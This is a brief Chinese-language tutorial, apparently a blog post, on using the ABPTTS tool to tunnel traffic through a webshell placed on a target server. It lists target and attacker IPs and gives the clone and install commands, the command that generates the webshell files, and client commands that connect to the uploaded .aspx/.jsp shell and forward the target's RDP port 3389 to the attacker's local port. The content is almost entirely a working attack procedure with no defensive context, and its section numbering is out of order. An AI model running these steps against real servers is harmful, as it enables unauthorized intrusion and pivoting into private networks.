靶机 15.76.11.192 放置webshell
攻击机 201.141.112.91 python abpttsclient.py ‐c webshell/config.txt
0x031 安装
git clone https://github.com/nccgroup/ABPTTS.git
apt install python‐setuptools
apt install python‐pip
pip install ‐‐upgrade pip
python ‐m pip install pycrypto
python ‐m pip install pycryptodome
python ‐m pip install httplib2
cd ABPTTS
python abpttsfactory.py ‐o webshell
0x02 目标边界上传脚本
0x03 攻击机连接
命令格式:
python abpttsclient.py ‐c webshell/config.txt ‐u "http://192.168.1.119/abptts.aspx"
# 将目标边界的3389转发到本地的33389端口上
python abpttsclient.py ‐c webshell/config.txt ‐u "http://15.76.11.192/abptts.jsp"
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容